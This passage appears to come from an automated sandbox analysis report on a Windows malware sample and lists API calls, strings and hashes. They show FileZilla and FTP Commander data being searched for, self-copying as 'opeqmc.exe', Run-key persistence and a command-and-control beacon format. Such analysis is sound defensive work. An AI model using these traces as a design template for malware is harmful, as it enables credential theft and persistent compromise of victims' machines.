                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                  • String ID: http://$+@
                  • API String ID: 147727044-3628382792
                  APIs
                  • SetFilePointer.KERNEL32(?,00000000,00000000,?,UniqueNum,00000000), ref: 00407E09
                  • WriteFile.KERNEL32(00000078,00000064,00000000,00000000), ref: 00407E20
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CreateModuleNamePointerWrite
                  • String ID: UniqueNum$x
                  • API String ID: 594998759-2399716736
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$*filezilla*
                  • API String ID: 3438805939-758400021
                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: #$&$ftp*commander*
                  • API String ID: 3438805939-1149875651
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: FreeString
                  • String ID: _blank$an.yandex.ru/count
                  • API String ID: 3341692771-25359924
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: File$CreateCurrentDirectoryModuleName
                  • String ID: \merocz.xc6
                  • API String ID: 3818821825-505599559
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Open
                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                  • API String ID: 71445658-3061378640
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                  • String ID:
                  • API String ID: 3604167287-0
                  APIs
                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                  • CharLowerW.USER32(00408795), ref: 004095D8
                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: CharFreeLowerString
                  • String ID:
                  • API String ID: 2335467167-0
                  • Opcode ID: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                  • Opcode Fuzzy Hash: a9b2d518bc86f0d25b60cd0557e0d7d5801712bcf914245b10683875f4897775
                  • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000), ref: 004072F9
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                  • __aulldiv.LIBCMT ref: 00407359
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                  • Opcode Fuzzy Hash: 4f6d7255259d029fcefee0a6ef84dda989e1e538c9ce85064cb776bb0b095d3e
                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: -
                  • API String ID: 885266447-2547889144
                  • Opcode ID: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                  • Opcode Fuzzy Hash: 9768e3a2316649ce80f3092f0a8653cf88643bc84f5cb20062fd1d2db9b0b25f
                  • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00409868
                  • SysAllocString.OLEAUT32(?), ref: 00409876
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: "URL"
                  • API String ID: 2525500382-1734660058
                  • Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
                  • Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
                  • Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004097ED
                  • SysAllocString.OLEAUT32(?), ref: 004097FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID: "domain"
                  • API String ID: 2525500382-3540696003
                  • Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
                  • Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
                  • Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50
                  APIs
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                  • FindClose.KERNEL32(00000000), ref: 0040AC0F
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: FindOpen$CloseFileFirst
                  • String ID:
                  • API String ID: 3155378417-0
                  • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                  • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                  • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                    • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                  • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                  • Sleep.KERNEL32(00002710), ref: 0040B3F7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                  • ExitProcess.KERNEL32 ref: 0040B44D
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                    • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                  • GetLastError.KERNEL32(00000004), ref: 0040B48D
                  • GetLastError.KERNEL32(00000004), ref: 0040B49A
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                  • GetLastError.KERNEL32(00000004), ref: 0040B500
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                  • API String ID: 3692109554-477663111
                  • Opcode ID: 5dcf4e451e470d8890dd4ade5d76f00a0e3579805ce90c0beb9d6229d45a20ee
                  • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                  • Opcode Fuzzy Hash: 5dcf4e451e470d8890dd4ade5d76f00a0e3579805ce90c0beb9d6229d45a20ee
                  • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF
                  APIs
                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004075FC
                  • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                  • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                  • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                  • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                  • CloseHandle.KERNEL32(?), ref: 00407714
                  • CloseHandle.KERNEL32(?), ref: 00407719
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                  • String ID:
                  • API String ID: 2296163861-0
                  • Opcode ID: 31584969f0d8c824f09f907cde1219f0f1ba332f2ad8a455396c3ebe95af8835
                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                  • Opcode Fuzzy Hash: 31584969f0d8c824f09f907cde1219f0f1ba332f2ad8a455396c3ebe95af8835
                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
                  APIs
                  • InternetOpenUrlW.WININET(?,?,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409CF4
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409CF7
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409D80
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE6
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Heap$Process$AllocateInternet$FileFreeOpenRead
                  • String ID:
                  • API String ID: 1606433043-0
                  • Opcode ID: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt
                  • API String ID: 536389180-3563684505
                  • Opcode ID: 4fe78ffc506b949ed18c1779bc78ee1e5113d94c3b4afea5b4e77ea3237f9061
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 4fe78ffc506b949ed18c1779bc78ee1e5113d94c3b4afea5b4e77ea3237f9061
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                  APIs
                  • Sleep.KERNEL32(00002710,?,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,?,00000000), ref: 0040A899
                  • Sleep.KERNELBASE(00002710,?,?,?,?,?,?,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,Iy@,?,?,?,?,?,?,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                  • String ID: 0$Iy@$Iy@$confirm^rev=%s^code=%s^param=%s^os=%s
                  • API String ID: 3100629401-635595758
                  • Opcode ID: e21f1483a08a9e9c02d775bbc8488e60abd853dd32556b7f820d3b87ce5a4a2c
                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                  • Opcode Fuzzy Hash: e21f1483a08a9e9c02d775bbc8488e60abd853dd32556b7f820d3b87ce5a4a2c
                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,?,UniqueNum), ref: 0040784D
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407880
                  • GetTickCount.KERNEL32 ref: 00407888
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$ChangeCloseCountCreateFindModuleNameNotificationTickTime
                  • String ID: UniqueNum
                  • API String ID: 341939912-3816303966
                  • Opcode ID: 4a1b5587f638b287927dc25e9214ab530ecb830b1a0472cd12236f6b46158c61
                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                  • Opcode Fuzzy Hash: 4a1b5587f638b287927dc25e9214ab530ecb830b1a0472cd12236f6b46158c61
                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                  APIs
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                  • ReadFile.KERNEL32(?,00000064,00000000,00000000), ref: 00407E74
                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                    • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.2879801974.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000411000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879823052.0000000000429000.00000040.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879873231.000000000042B000.00000080.00000001.01000000.00000007.sdmp
                  • Associated: 00000005.00000002.2879888294.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                  Similarity
                  • API ID: File$CreateModuleNamePointerRead
                  • String ID: UniqueNum$d$x
                  • API String ID: 1528952607-727609663
                  • Opcode ID: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                  • Opcode Fuzzy Hash: e781d678688d42d7516b702b2ceb6c7207e197dfbc75e9fa72b18e73f6410cb1
                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                  APIs
                  • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC44
                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,?,?, /nomove,?,0040AB30,?), ref: 0040AC72
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  Strings
                  Memory Dump Source
